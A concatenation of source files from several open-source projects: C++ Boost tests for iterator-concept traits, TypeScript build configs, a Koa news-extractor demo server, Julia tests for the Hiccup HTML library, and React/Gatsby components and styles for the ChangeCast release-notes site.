BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< implicit_bidirectional_iterator, implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< explicit_random_access_iterator, explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< implicit_random_access_iterator, implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sentinel< explicit_forward_iterator >, explicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sentinel< implicit_forward_iterator >, implicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sentinel< explicit_bidirectional_iterator >, explicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sentinel< implicit_bidirectional_iterator >, implicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sentinel< explicit_random_access_iterator >, explicit_random_access_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sentinel< implicit_random_access_iterator >, implicit_random_access_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< explicit_forward_iterator >, explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< implicit_forward_iterator >, implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< explicit_bidirectional_iterator >, explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< implicit_bidirectional_iterator >, implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< explicit_random_access_iterator >, explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< implicit_random_access_iterator >, implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< int* >, int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(InputIterator) {
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< explicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< implicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< sentinel< explicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< sentinel< implicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< sentinel< explicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< sentinel< implicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< sentinel< explicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< sentinel< implicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(OutputIterator) {
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< explicit_output_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< implicit_output_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< explicit_non_output_iterator, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< implicit_non_output_iterator, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< sentinel< explicit_output_iterator >, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< sentinel< implicit_output_iterator >, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< int*, int >::value ), true );
}
BOOST_AUTO_TEST_CASE(ForwardIterator) {
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< explicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< implicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< sentinel< explicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< sentinel< implicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< sentinel< explicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< sentinel< implicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< sentinel< explicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< sentinel< implicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(BidirectionalIterator) {
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< explicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< implicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< explicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< implicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< sentinel< explicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< sentinel< implicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< sentinel< explicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< sentinel< implicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< sentinel< explicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< sentinel< implicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(RandomAccessIterator) {
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< explicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< implicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< explicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< implicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< explicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< implicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< sentinel< explicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< sentinel< implicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< sentinel< explicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< sentinel< implicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< sentinel< explicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< sentinel< implicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(ContiguousIterator) {
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< explicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< implicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< explicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< implicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< explicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< implicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< explicit_random_access_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< implicit_random_access_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< sentinel< explicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< sentinel< implicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< sentinel< explicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< sentinel< implicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< sentinel< explicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< sentinel< implicit_random_access_iterator > >::value ), false );
#ifdef __cpp_lib_ranges
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< int* >::value ), true );
#else
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< int* >::value ), false );
#endif
}
BOOST_AUTO_TEST_CASE(IndirectlyMovable) {
BOOST_CHECK_EQUAL( ( slce::is_indirectly_movable< typename std::vector< non_copyable >::iterator, typename std::vector< non_copyable >::iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_movable< typename std::vector< movable >::iterator, typename std::vector< movable >::iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_movable< typename std::vector< copyable >::iterator, typename std::vector< copyable >::iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(IndirectlyCopyable) {
BOOST_CHECK_EQUAL( ( slce::is_indirectly_copyable< typename std::vector< non_copyable >::iterator, typename std::vector< non_copyable >::iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_copyable< typename std::vector< movable >::iterator, typename std::vector< movable >::iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_copyable< typename std::vector< copyable >::iterator, typename std::vector< copyable >::iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(IndirectlyCopyableStorable) {
BOOST_CHECK_EQUAL( ( slce::is_indirectly_copyable_storable< typename std::vector< non_copyable >::iterator, typename std::vector< non_copyable >::iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_copyable_storable< typename std::vector< movable >::iterator, typename std::vector< movable >::iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_copyable_storable< typename std::vector< copyable >::iterator, typename std::vector< copyable >::iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(IndirectlySwappable) {
BOOST_CHECK_EQUAL( ( slce::is_indirectly_swappable< typename std::vector< non_copyable >::iterator, typename std::vector< non_copyable >::iterator >::value ), false );
#ifdef __cpp_lib_ranges
BOOST_CHECK_EQUAL( ( slce::is_indirectly_swappable< typename std::vector< movable >::iterator, typename std::vector< movable >::iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_swappable< typename std::vector< copyable >::iterator, typename std::vector< copyable >::iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_swappable< typename std::vector< base >::iterator, typename std::vector< base >::iterator >::value ), true );
#endif
}
| Fadis/slce |
<|start_filename|>rollup.config.js<|end_filename|>
import typescript from "@rollup/plugin-typescript";
import { resolve } from "path";
import ttypescript from "ttypescript";
const tsconfig = resolve(__dirname, "tsconfig.build.json");
export default {
input: "src/index.ts",
output: {
dir: "dist",
format: "es",
},
plugins: [typescript({ tsconfig, typescript: ttypescript })],
external: [
"dequal",
"react",
"is-promise",
"clone-deep",
"object-path",
"reflect-metadata",
],
};
<|start_filename|>tsconfig.build.json<|end_filename|>
{
"compilerOptions": {
"importHelpers": true,
"removeComments": true,
"emitDecoratorMetadata": true,
"experimentalDecorators": true,
"strict": true,
"strictPropertyInitialization": false,
"noImplicitAny": false,
"esModuleInterop": true,
"baseUrl": ".",
"moduleResolution": "node",
"jsx": "react",
"target": "ES6",
"rootDir": "src",
"declaration": true,
"declarationDir": "dist",
"plugins": [
{
"transform": "@zerollup/ts-transform-paths",
"exclude": ["*"]
}
]
},
"include": ["src"],
"exclude": ["src/**/*.spec.ts"]
}
| sahabpardaz/react-store |
<|start_filename|>demo/index.js<|end_filename|>
const Koa = require('koa')
const Router = require('koa-router')
const fetch = require('node-fetch')
const GeneralNewsExtractor = require('general-news-extractor')
const app = new Koa()
const router = new Router()
router.get('/', (ctx, next) => {
ctx.response.type = 'html'
ctx.body = `
<h1>GeneralNewsExtractor Demo</h1>
<div>
<ul>
<li>
<a href="http://baijiahao.baidu.com/s?id=1646431966952708911"
>http://baijiahao.baidu.com/s?id=1646431966952708911</a
>
<button onclick="handleClickOpenUrl('https://news.ifeng.com/c/7qV0OaOFL9L')">
extractor
</button>
</li>
<li>
<a href="https://news.ifeng.com/c/7qV0OaOFL9L">https://news.ifeng.com/c/7qV0OaOFL9L</a>
<button onclick="handleClickOpenUrl('https://news.ifeng.com/c/7qV0OaOFL9L')">
extractor
</button>
</li>
<li>
<a href="https://money.163.com/19/1004/08/EQKLMJVC00259DLP.html"
>https://money.163.com/19/1004/08/EQKLMJVC00259DLP.html</a
>
<button
onclick="handleClickOpenUrl('https://money.163.com/19/1004/08/EQKLMJVC00259DLP.html')"
>
extractor
</button>
</li>
<li>
<a href="https://news.sina.com.cn/c/2019-10-04/doc-iicezzrr0017275.shtml">https://news.sina.com.cn/c/2019-10-04/doc-iicezzrr0017275.shtml</a>
<button onclick="handleClickOpenUrl('https://news.sina.com.cn/c/2019-10-04/doc-iicezzrr0017275.shtml')">
extractor
</button>
</li>
<li>
<a href="https://new.qq.com/rain/a/20191004A0415600">https://new.qq.com/rain/a/20191004A0415600</a>
<button onclick="handleClickOpenUrl('https://new.qq.com/rain/a/20191004A0415600')">
extractor
</button>
</li>
<li>
<a
href="https://www.theguardian.com/sport/2019/oct/03/mlb-playoff-preview-will-the-dodgers-finally-hold-their-nerve"
>https://www.theguardian.com/sport/2019/oct/03/mlb-playoff-preview-will-the-dodgers-finally-hold-their-nerve</a
>
<button
onclick="handleClickOpenUrl('https://www.theguardian.com/sport/2019/oct/03/mlb-playoff-preview-will-the-dodgers-finally-hold-their-nerve')"
>
extractor
</button>
</li>
</ul>
<h3>or</h3>
<div>
<input
id="input"
type="text"
placeholder="Enter a news url"
style="width: 200px"
/>
<button onclick="handleClickOpenUrl(document.querySelector('#input').value)">
extractor
</button>
</div>
<script>
const handleClickOpenUrl = value => {
window.open('http://' + location.host + '/go?url=' + value)
}
</script>
</div>
`
})
router.get('/go', async (ctx, next) => {
const {
query: { url }
} = ctx.request
if (!url || !url.startsWith('http')) {
ctx.throw(400)
}
const body = await fetch(url).then(res => res.textConverted())
const gne = new GeneralNewsExtractor()
const result = gne.extract(body)
result.source = url
ctx.body = JSON.stringify(result, null, 4)
})
app.use(router.routes()).use(router.allowedMethods())
// app.listen(3000)
module.exports = app.callback()
| zenghongtu/general-news-extractor-js |
<|start_filename|>test/runtests.jl<|end_filename|>
using Hiccup
using Test
@tags br, link
# hiccup div conflicts with main div, so use this as compromise
ediv = Hiccup.div
@test occursin("class=\"class1 class2\"", sprint(Hiccup.render, Node(:img, "#id.class1.class2", Dict(:src=>"http://www.com"))))
classMatching = ((".section-title", "section-title"),
(".test", "test"),
(".test1.test2", "test1 test2"),
(".-test", "-test"),
(".-test1.-test2", "-test1 -test2"),
("#.test", "test"),
("#.test1-hyphen", "test1-hyphen"),
("#.test1-hyphen.test2", "test1-hyphen test2"),
("#id.test1.test2", "test1 test2"),
("#id.test1.-test2", "test1 -test2"),
("#id.test1.-test-2", "test1 -test-2"),
("#id.test-hyphen", "test-hyphen"),
("#id.-test", "-test"),
("#id.-test.test2", "-test test2"),
("#id.-test.-test2", "-test -test2"))
for (in, expected) in classMatching
@test occursin(expected, sprint(Hiccup.render, Hiccup.div(in, "contents")))
end
# tests for void tags
@test string(br()) == "<br />"
@test string(img(".image-test", [])) == "<img class=\"image-test\" />"
@test occursin(
"/>",
string(link(Dict(:rel => "stylesheet", :href => "test.css"))))
@test_throws ArgumentError img(strong(".test", "test"))
# tests for normal tags
@test string(ediv(ediv(ediv()))) == "<div><div><div></div></div></div>"
# test escapes
@test string(Node(:pre, "<p>fish & chips</p>")) ==
"<pre><p>fish &amp; chips</p></pre>"
@test string(Node(:a, "link", href="http://example.com/test?a&b")) ==
"<a href=\"http://example.com/test?a&b\">link</a>"
| UnofficialJuliaMirror/Hiccup.jl-9fb69e20-1954-56bb-a84f-559cc56a8ff7 |
<|start_filename|>site/src/components/Button/Button.js<|end_filename|>
import React from 'react'
export const buttonStyles = {
border: '2px solid transparent',
borderRadius: '4px',
margin: 0,
padding: '0.35rem',
width: 'auto',
minWidth: 'auto',
overflow: 'visible',
background: 'transparent',
color: 'inherit',
font: 'inherit',
lineHeight: 'normal',
WebkitApppearance: 'none',
cursor: 'pointer',
display: 'inline-flex',
alignItems: 'center',
transition: 'background 200ms ease, transform 200ms ease',
':hover': {
textDecoration: 'none',
background: 'rgba(0, 0, 0, 0.1)',
},
}
export const Button = React.forwardRef((props, ref) => (
<button ref={ref} css={buttonStyles} {...props} />
))
<|start_filename|>widget/src/styles.css<|end_filename|>
.notification {
display: inline-block;
border-radius: 50%;
width: 22px;
height: 22px;
background-color: #ff3e43;
position: absolute;
right: -10px;
top: -10px;
color: #f7f7f7;
font-size: 11px;
text-align: center;
line-height: 22px;
font-weight: bold;
opacity: 1;
letter-spacing: 0;
animation: growIn 500ms cubic-bezier(0.175, 0.985, 0.1, 1.035);
}
.iframe {
opacity: 1;
position: fixed;
height: 100vh;
width: 100vw;
top: 0;
right: 0;
margin: 0;
padding: 0;
border: none;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
animation: slideOut 500ms cubic-bezier(0.175, 0.985, 0.1, 1.035);
}
.iframeOpen {
transform: translateX(0);
animation: slideIn 500ms cubic-bezier(0.175, 0.985, 0.1, 1.035);
}
.iframeHidden {
opacity: 0;
pointer-events: none;
}
.overlay {
height: 100%;
width: 100%;
background: black;
opacity: 0;
top: 0;
left: 0;
position: fixed;
transition: opacity 350ms linear;
}
.overlayOpen {
opacity: 0.5;
visibility: visible;
}
.overlayHidden {
visibility: hidden;
}
@media (min-width: 800px) {
.iframe {
width: 399px;
}
}
@keyframes slideIn {
from {
transform: translateX(100%);
}
to {
transform: translateX(0);
}
}
@keyframes slideOut {
from {
transform: translateX(0);
}
to {
transform: translateX(100%);
}
}
@keyframes growIn {
from {
transform: scale(0.1);
}
to {
transform: scale(1);
}
}
<|start_filename|>site/src/components/Tag.js<|end_filename|>
import React from 'react'
export const Tag = ({ children, ...rest }) => (
<span
css={{
backgroundColor: '#ff3e43',
color: 'white',
borderRadius: 4,
display: 'inline-block',
fontSize: 12,
fontWeight: 600,
letterSpacing: 'normal',
paddingLeft: '0.5rem',
paddingRight: '0.5rem',
textAlign: 'center',
textTransform: 'uppercase',
}}
{...rest}
>
{children}
</span>
)
<|start_filename|>package.json<|end_filename|>
{
"name": "changecast",
"private": true,
"license": "MIT",
"scripts": {
"build": "yarn build:widget && yarn build:site",
"build:site": "cd site && yarn build",
"build:widget": "cd widget && yarn build",
"build:docs": "cd docs && yarn build",
"postinstall": "patch-package",
"now-build": "yarn build"
},
"devDependencies": {
"patch-package": "^6.0.5",
"postinstall-postinstall": "^2.0.0"
},
"workspaces": {
"packages": [
"docs",
"site",
"widget",
"icons"
]
},
"prettier": {
"semi": false,
"singleQuote": true,
"trailingComma": "es5"
}
}
<|start_filename|>site/gatsby-node.js<|end_filename|>
const path = require('path')
const fs = require('fs')
const { createRemoteFileNode } = require(`gatsby-source-filesystem`)
let releaseEdges
exports.createPages = async ({ graphql, actions: { createPage } }) => {
const releaseTemplate = path.resolve('./src/templates/ReleaseTemplate.js')
const releasesTemplate = path.resolve('./src/templates/ReleasesTemplate.js')
const query = `
{
site {
siteMetadata {
title
}
}
repository: allGithubRepo {
edges {
node {
name
}
}
}
releases: allGithubRelease(filter: { draft: { eq: false } }) {
edges {
node {
name
tagName
publishedAt
}
}
}
}
`
const result = await graphql(query)
releaseEdges = result.data.releases.edges
result.data.releases.edges.forEach(({ node: { name, tagName } }) => {
createPage({
path: `/${tagName}`,
component: releaseTemplate,
context: {
ogText: name || tagName,
tagName,
},
})
})
const ogText =
result.data.site.siteMetadata.title ||
result.data.repository.edges[0].node.name
createPage({
path: `/`,
component: releasesTemplate,
context: {
ogText,
isWidget: false,
},
})
createPage({
path: `/widget`,
component: releasesTemplate,
context: {
ogText,
isWidget: true,
},
})
}
exports.sourceNodes = async ({
store,
cache,
createNodeId,
actions: { createNode },
}) => {
if (process.env.LOGO_URL) {
await createRemoteFileNode({
url: process.env.LOGO_URL,
store,
cache,
createNode,
createNodeId,
name: 'logo',
})
}
}
exports.onPostBuild = () =>
fs.writeFileSync(
path.resolve(process.cwd(), 'public', 'release-dates.json'),
JSON.stringify(
releaseEdges.slice(0, 10).map(({ node: { publishedAt } }) => publishedAt)
)
)
<|start_filename|>docs/src/components/Button/Button.js<|end_filename|>
import React from 'react'
export const buttonStyles = {
color: 'white',
display: 'inline-block',
verticalAlign: 'bottom',
position: 'relative',
padding: '12px 20px 12px',
border: '2px solid transparent',
borderRadius: '4px',
fontWeight: '700',
userSelect: 'none',
textAlign: 'center',
textDecoration: 'none',
cursor: 'pointer',
whiteSpace: 'nowrap',
transition: 'background 200ms ease, transform 200ms ease',
':hover': {
background: 'rgba(0, 0, 0, 0.1)',
},
}
export const Button = props => <button css={buttonStyles} {...props} />
<|start_filename|>site/package.json<|end_filename|>
{
"name": "changecast-site",
"private": true,
"description": "ChangeCast site generated from Github releases.",
"version": "0.1.0",
"author": "<NAME> <<EMAIL>>",
"license": "MIT",
"scripts": {
"build": "gatsby build",
"develop": "gatsby develop",
"serve": "gatsby serve"
},
"dependencies": {
"@babel/core": "^7.0.0-0",
"@emotion/core": "^10.0.7",
"@reach/menu-button": "0.1.7",
"@reach/tooltip": "^0.1.3",
"@reach/visually-hidden": "^0.1.2",
"date-fns": "^1.30.1",
"dotenv": "^6.2.0",
"fbjs": "^1.0.0",
"fuse.js": "^3.4.4",
"gatsby": "^2.1.19",
"gatsby-image": "^2.0.29",
"gatsby-plugin-emotion": "4.0.1",
"gatsby-plugin-manifest": "^2.0.16",
"gatsby-plugin-offline": "^2.0.22",
"gatsby-plugin-react-helmet": "^3.0.5",
"gatsby-plugin-sharp": "^2.0.19",
"gatsby-plugin-typography": "^2.2.10",
"gatsby-remark-external-links": "^0.0.4",
"gatsby-remark-gemoji-to-emoji": "^1.0.0",
"gatsby-remark-images": "file:../plugins/gatsby-remark-images",
"gatsby-remark-prismjs": "^3.2.4",
"gatsby-source-filesystem": "^2.0.27",
"gatsby-source-github-releases": "file:../plugins/gatsby-source-github-releases",
"gatsby-transformer-color-thief": "file:../plugins/gatsby-transformer-color-thief",
"gatsby-transformer-favicons": "file:../plugins/gatsby-transformer-favicons",
"gatsby-transformer-json": "^2.1.8",
"gatsby-transformer-og-image": "file:../plugins/gatsby-transformer-og-image",
"gatsby-transformer-remark": "^2.2.2",
"gatsby-transformer-remark-plaintext": "^1.0.3",
"gatsby-transformer-sharp": "^2.1.13",
"hex-rgb": "^4.0.0",
"icons": "0.1.0",
"js-search": "^1.4.2",
"just-debounce-it": "^1.1.0",
"mark.js": "^8.11.1",
"normalize.css": "^8.0.1",
"object-assign": "^4.1.1",
"prismjs": "^1.15.0",
"prop-types": "^15.7.2",
"react": "^16.8.1",
"react-dom": "^16.8.1",
"react-helmet": "^5.2.0",
"react-typography": "^0.16.19",
"react-waypoint": "^8.1.0",
"typography": "^0.16.19"
}
}
<|start_filename|>icons/Radio.js<|end_filename|>
import React from 'react'
export const Radio = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Radio_svg__feather Radio_svg__feather-radio"
{...props}
>
<circle cx={12} cy={12} r={2} />
<path d="M16.24 7.76a6 6 0 0 1 0 8.49m-8.48-.01a6 6 0 0 1 0-8.49m11.31-2.82a10 10 0 0 1 0 14.14m-14.14 0a10 10 0 0 1 0-14.14" />
</svg>
)
<|start_filename|>site/src/components/Button/MenuButton.js<|end_filename|>
import { keyframes } from '@emotion/core'
import {
Menu,
MenuButton as ReachMenuButton,
MenuItem as ReachMenuItem,
MenuLink as ReachMenuLink,
MenuList as ReachMenuList,
} from '@reach/menu-button'
import React from 'react'
import { theme } from '../../styles/theme'
export const MenuButton = props => (
<ReachMenuButton
css={{
display: 'block',
border: 'none',
margin: 0,
padding: 0,
cursor: 'pointer',
background: 'transparent' /* inherit font & color from ancestor */,
font:
'inherit' /* Normalize `line-height`. Cannot be changed from `normal` in Firefox 4+. */,
lineHeight:
'normal' /* Corrects inability to style clickable `input` types in iOS */,
WebkitApppearance: 'none',
transition: 'color 100ms ease-in',
color: theme.color.accent,
':hover': {
color: theme.color.text,
},
}}
{...props}
/>
)
const fadeInScaleUp = keyframes`
0% {
opacity: 0;
transform: scale(.5) translateY(-25px)
}
100% {
opacity: 1;
transform: scale(1) translateY(0px)
}
`
export const MenuList = props => (
<ReachMenuList
css={{
position: 'relative',
border: `1px solid lightgray`,
animation: `${fadeInScaleUp} 150ms cubic-bezier(.2,0,.13,1.5)`,
padding: '5px 0',
fontSize: '1rem',
borderRadius: 3,
background: 'white',
boxShadow: '0 3px 12px rgba(27,31,35,.15)',
}}
{...props}
/>
)
export const menuItemStyles = {
padding: '4px 15px 4px 10px',
display: 'flex',
alignItems: 'center',
}
export const MenuItem = props => (
<ReachMenuItem css={menuItemStyles} {...props} />
)
export const MenuLink = props => (
<ReachMenuLink css={menuItemStyles} {...props} />
)
export { Menu }
<|start_filename|>icons/AbstractIcon10.js<|end_filename|>
import React from 'react'
export const AbstractIcon10 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<defs>
<path id="AbstractIcon10_svg__a" d="M0 0h12v12H0z" />
</defs>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<use
fill="#4D61FC"
xlinkHref="#AbstractIcon10_svg__a"
transform="rotate(45 -4.243 30.728)"
/>
<path
fill="#00396B"
d="M17.834 14.652l8.485 8.485-3.182 3.182-8.485-8.485z"
/>
<path
fill="#EAF0FF"
d="M20.485 17.304l3.182 3.182-3.182 3.182-3.182-3.182z"
/>
</g>
</svg>
)
<|start_filename|>site/src/templates/ReleasesTemplate.js<|end_filename|>
import { Global } from '@emotion/core'
import { graphql } from 'gatsby'
import { Search, UnorderedSearchIndex } from 'js-search'
import debounce from 'just-debounce-it'
import Mark from 'mark.js'
import React from 'react'
import Helmet from 'react-helmet'
import Waypoint from 'react-waypoint'
import { Favicons } from '../components/Favicons'
import { FocusStyles } from '../components/FocusStyles'
import { Header } from '../components/Header'
import { Release } from '../components/Release/Release'
import { SiteWrapper } from '../components/SiteWrapper'
import { WidgetWrapper } from '../components/WidgetWrapper'
import { useSiteSetup } from '../hooks/useSiteSetup'
import { SiteProvider } from '../providers/SiteProvider'
import { WidgetContext, WidgetProvider } from '../providers/WidgetProvider'
import { globalStyles } from '../styles/global'
